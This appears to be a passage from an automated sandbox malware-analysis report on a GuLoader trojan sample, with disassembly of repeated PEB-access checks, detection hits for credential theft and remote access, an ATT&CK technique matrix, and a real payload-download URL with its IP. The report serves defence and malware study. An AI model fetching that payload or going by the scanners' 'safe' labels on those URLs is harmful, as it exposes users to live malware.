      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AB440 mov eax, dword ptr fs:[00000030h]4_2_328AB440
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297547F mov eax, dword ptr fs:[00000030h]4_2_3297547F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1460 mov eax, dword ptr fs:[00000030h]4_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1460 mov eax, dword ptr fs:[00000030h]4_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1460 mov eax, dword ptr fs:[00000030h]4_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1460 mov eax, dword ptr fs:[00000030h]4_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1460 mov eax, dword ptr fs:[00000030h]4_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BF460 mov eax, dword ptr fs:[00000030h]4_2_328BF460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289758F mov eax, dword ptr fs:[00000030h]4_2_3289758F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289758F mov eax, dword ptr fs:[00000030h]4_2_3289758F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289758F mov eax, dword ptr fs:[00000030h]4_2_3289758F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292B594 mov eax, dword ptr fs:[00000030h]4_2_3292B594
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292B594 mov eax, dword ptr fs:[00000030h]4_2_3292B594
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3293D5B0 mov eax, dword ptr fs:[00000030h]4_2_3293D5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3293D5B0 mov eax, dword ptr fs:[00000030h]4_2_3293D5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15A9 mov eax, dword ptr fs:[00000030h]4_2_328C15A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15A9 mov eax, dword ptr fs:[00000030h]4_2_328C15A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15A9 mov eax, dword ptr fs:[00000030h]4_2_328C15A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15A9 mov eax, dword ptr fs:[00000030h]4_2_328C15A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15A9 mov eax, dword ptr fs:[00000030h]4_2_328C15A9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329335BA mov eax, dword ptr fs:[00000030h]4_2_329335BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329335BA mov eax, dword ptr fs:[00000030h]4_2_329335BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329335BA mov eax, dword ptr fs:[00000030h]4_2_329335BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329335BA mov eax, dword ptr fs:[00000030h]4_2_329335BA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F5BE mov eax, dword ptr fs:[00000030h]4_2_3295F5BE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CF5B0 mov eax, dword ptr fs:[00000030h]4_2_328CF5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329735D7 mov eax, dword ptr fs:[00000030h]4_2_329735D7
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329735D7 mov eax, dword ptr fs:[00000030h]4_2_329735D7
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329735D7 mov eax, dword ptr fs:[00000030h]4_2_329735D7
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D5D0 mov eax, dword ptr fs:[00000030h]4_2_3291D5D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D5D0 mov ecx, dword ptr fs:[00000030h]4_2_3291D5D0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D55C0 mov eax, dword ptr fs:[00000030h]4_2_328D55C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C95DA mov eax, dword ptr fs:[00000030h]4_2_328C95DA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329755C9 mov eax, dword ptr fs:[00000030h]4_2_329755C9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C15F4 mov eax, dword ptr fs:[00000030h]4_2_328C15F4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D7505 mov eax, dword ptr fs:[00000030h]4_2_328D7505
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D7505 mov ecx, dword ptr fs:[00000030h]4_2_328D7505
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32975537 mov eax, dword ptr fs:[00000030h]4_2_32975537
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294F525 mov eax, dword ptr fs:[00000030h]4_2_3294F525
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295B52F mov eax, dword ptr fs:[00000030h]4_2_3295B52F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DD530 mov eax, dword ptr fs:[00000030h]4_2_328DD530
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DD530 mov eax, dword ptr fs:[00000030h]4_2_328DD530
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AD534 mov eax, dword ptr fs:[00000030h]4_2_328AD534
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B550 mov eax, dword ptr fs:[00000030h]4_2_3294B550
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B550 mov eax, dword ptr fs:[00000030h]4_2_3294B550
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294B550 mov eax, dword ptr fs:[00000030h]4_2_3294B550
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289B562 mov eax, dword ptr fs:[00000030h]4_2_3289B562
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DB570 mov eax, dword ptr fs:[00000030h]4_2_328DB570
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DB570 mov eax, dword ptr fs:[00000030h]4_2_328DB570
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897A80 mov eax, dword ptr fs:[00000030h]4_2_32897A80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897A80 mov eax, dword ptr fs:[00000030h]4_2_32897A80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897A80 mov eax, dword ptr fs:[00000030h]4_2_32897A80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295FA87 mov eax, dword ptr fs:[00000030h]4_2_3295FA87
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDAAE mov eax, dword ptr fs:[00000030h]4_2_328CDAAE
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABAA0 mov eax, dword ptr fs:[00000030h]4_2_328ABAA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABAA0 mov eax, dword ptr fs:[00000030h]4_2_328ABAA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289FAA4 mov ecx, dword ptr fs:[00000030h]4_2_3289FAA4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32951AA3 mov eax, dword ptr fs:[00000030h]4_2_32951AA3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32951AA3 mov eax, dword ptr fs:[00000030h]4_2_32951AA3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32951AA3 mov eax, dword ptr fs:[00000030h]4_2_32951AA3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294DAAC mov ecx, dword ptr fs:[00000030h]4_2_3294DAAC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294DAAC mov ecx, dword ptr fs:[00000030h]4_2_3294DAAC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294DAAC mov eax, dword ptr fs:[00000030h]4_2_3294DAAC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32935AD0 mov eax, dword ptr fs:[00000030h]4_2_32935AD0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CBADA mov eax, dword ptr fs:[00000030h]4_2_328CBADA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32921ACB mov eax, dword ptr fs:[00000030h]4_2_32921ACB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32921ACB mov ecx, dword ptr fs:[00000030h]4_2_32921ACB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289BAE0 mov eax, dword ptr fs:[00000030h]4_2_3289BAE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32947A11 mov edi, dword ptr fs:[00000030h]4_2_32947A11
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D5A01 mov eax, dword ptr fs:[00000030h]4_2_328D5A01
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D5A01 mov ecx, dword ptr fs:[00000030h]4_2_328D5A01
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D5A01 mov eax, dword ptr fs:[00000030h]4_2_328D5A01
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D5A01 mov eax, dword ptr fs:[00000030h]4_2_328D5A01
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291DA1D mov eax, dword ptr fs:[00000030h]4_2_3291DA1D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C9A18 mov ecx, dword ptr fs:[00000030h]4_2_328C9A18
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295FA02 mov eax, dword ptr fs:[00000030h]4_2_3295FA02
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289BA10 mov eax, dword ptr fs:[00000030h]4_2_3289BA10
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294BA0B mov eax, dword ptr fs:[00000030h]4_2_3294BA0B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294BA0B mov eax, dword ptr fs:[00000030h]4_2_3294BA0B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294BA0B mov eax, dword ptr fs:[00000030h]4_2_3294BA0B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294BA0B mov eax, dword ptr fs:[00000030h]4_2_3294BA0B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDA20 mov eax, dword ptr fs:[00000030h]4_2_328CDA20
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDA20 mov eax, dword ptr fs:[00000030h]4_2_328CDA20
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov eax, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov ecx, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov eax, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov eax, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov eax, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328ABA30 mov eax, dword ptr fs:[00000030h]4_2_328ABA30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32899A40 mov ecx, dword ptr fs:[00000030h]4_2_32899A40
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32933A78 mov eax, dword ptr fs:[00000030h]4_2_32933A78
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295FB97 mov eax, dword ptr fs:[00000030h]4_2_3295FB97
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9B9F mov eax, dword ptr fs:[00000030h]4_2_328D9B9F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9B9F mov eax, dword ptr fs:[00000030h]4_2_328D9B9F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9B9F mov eax, dword ptr fs:[00000030h]4_2_328D9B9F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32969B8B mov eax, dword ptr fs:[00000030h]4_2_32969B8B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32969B8B mov eax, dword ptr fs:[00000030h]4_2_32969B8B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDBA0 mov eax, dword ptr fs:[00000030h]4_2_328CDBA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897BCD mov eax, dword ptr fs:[00000030h]4_2_32897BCD
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32897BCD mov ecx, dword ptr fs:[00000030h]4_2_32897BCD
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292FBDC mov eax, dword ptr fs:[00000030h]4_2_3292FBDC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292FBDC mov eax, dword ptr fs:[00000030h]4_2_3292FBDC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292FBDC mov eax, dword ptr fs:[00000030h]4_2_3292FBDC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A9BC4 mov eax, dword ptr fs:[00000030h]4_2_328A9BC4
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3BD6 mov eax, dword ptr fs:[00000030h]4_2_328B3BD6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3BD6 mov eax, dword ptr fs:[00000030h]4_2_328B3BD6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3BD6 mov eax, dword ptr fs:[00000030h]4_2_328B3BD6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3BD6 mov eax, dword ptr fs:[00000030h]4_2_328B3BD6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3BD6 mov eax, dword ptr fs:[00000030h]4_2_328B3BD6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E1BEF mov eax, dword ptr fs:[00000030h]4_2_328E1BEF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E1BEF mov eax, dword ptr fs:[00000030h]4_2_328E1BEF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295FBF3 mov eax, dword ptr fs:[00000030h]4_2_3295FBF3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov eax, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov eax, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov eax, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov eax, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov eax, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CDB00 mov edx, dword ptr fs:[00000030h]4_2_328CDB00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1B04 mov eax, dword ptr fs:[00000030h]4_2_328A1B04
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A1B04 mov eax, dword ptr fs:[00000030h]4_2_328A1B04
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295FB0C mov eax, dword ptr fs:[00000030h]4_2_3295FB0C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9B28 mov eax, dword ptr fs:[00000030h]4_2_328D9B28
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D9B28 mov eax, dword ptr fs:[00000030h]4_2_328D9B28
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32935B50 mov eax, dword ptr fs:[00000030h]4_2_32935B50
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32935B50 mov eax, dword ptr fs:[00000030h]4_2_32935B50
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289FB4C mov edi, dword ptr fs:[00000030h]4_2_3289FB4C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping211
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Process Injection
      NTDS22
      System Information Discovery
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      wmKmOQ868z.exe32%ReversingLabsWin32.Trojan.GuLoader
      wmKmOQ868z.exe100%AviraHEUR/AGEN.1331786
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsx116.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://comercializadoradeinsumos.cl/0%Avira URL Cloudsafe
      https://comercializadoradeinsumos.cl/LNRHXbp85.binOp0%Avira URL Cloudsafe
      https://comercializadoradeinsumos.cl/LNRHXbp85.bin_p0%Avira URL Cloudsafe
      https://comercializadoradeinsumos.cl/LNRHXbp85.bin0%Avira URL Cloudsafe
      https://comercializadoradeinsumos.cl/X0%Avira URL Cloudsafe
      https://comercializadoradeinsumos.cl/LNRHXbp85.binz0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      comercializadoradeinsumos.cl
      162.240.106.189
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://comercializadoradeinsumos.cl/LNRHXbp85.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdwmKmOQ868z.exe, 00000004.00000001.2652302474.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          high
          https://comercializadoradeinsumos.cl/XwmKmOQ868z.exe, 00000004.00000003.3008838276.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3009015750.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341099454.0000000002766000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.ftp.ftp://ftp.gopher.wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdwmKmOQ868z.exe, 00000004.00000001.2652302474.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              http://nsis.sf.net/NSIS_ErrorErrorwmKmOQ868z.exefalse
                high
